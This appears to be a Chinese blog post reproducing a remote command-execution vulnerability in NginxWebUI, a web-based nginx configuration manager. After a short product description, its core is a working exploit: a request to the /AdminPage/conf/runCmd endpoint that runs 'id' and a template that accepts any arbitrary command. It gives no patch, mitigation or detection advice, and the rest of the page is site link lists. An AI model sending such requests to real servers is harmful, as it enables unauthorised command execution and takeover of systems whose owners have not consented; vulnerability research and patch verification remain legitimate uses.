nginxWebUI runCmd命令执行漏洞复现

仲瑿2023-07-25 19:09

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
相关推荐
Lovyk1 小时前
基于 Ansible 与 Jinja2 模板的 LNMP 环境及 WordPress 自动化部署实践
linux·运维·服务器·自动化·ansible
知白守黑2672 小时前
Linux磁盘阵列
linux·运维·服务器
维尔切3 小时前
Linux中基于Centos7使用lamp架构搭建个人论坛(wordpress)
linux·运维·架构
丘大梨4 小时前
QT 基础聊天应用项目文档
运维·数据库·系统架构
怀刃5 小时前
C# 内存监控怎么定位问题
运维
TPBoreas5 小时前
Jenkins启动端口修改失败查找日志
运维·服务器·jenkins
正在努力的小河7 小时前
Linux设备树简介
linux·运维·服务器
荣光波比7 小时前
Linux(十一)——LVM磁盘配额整理
linux·运维·云计算
小张快跑。7 小时前
Tomcat下载、安装及配置详细教程
java·服务器·tomcat
小晶晶京京7 小时前
day35-负载均衡
运维·网络·网络协议·学习·负载均衡
热门推荐
01UV安装并设置国内源02Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code03KGG转MP3工具|非KGM文件|解密音频04【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)052025最新国内服务器可用docker源仓库地址大全(2025年8月更新)06蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接07TRAE 规则(Rules)配置指南:个人习惯、团队规范与最佳实践08NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南09阿里开源首个图像生成基础模型——Qwen-Image本地部署教程,超强中文渲染能力刷新SOTA!10TRAE Rules 实践:为项目配置 6A 工作流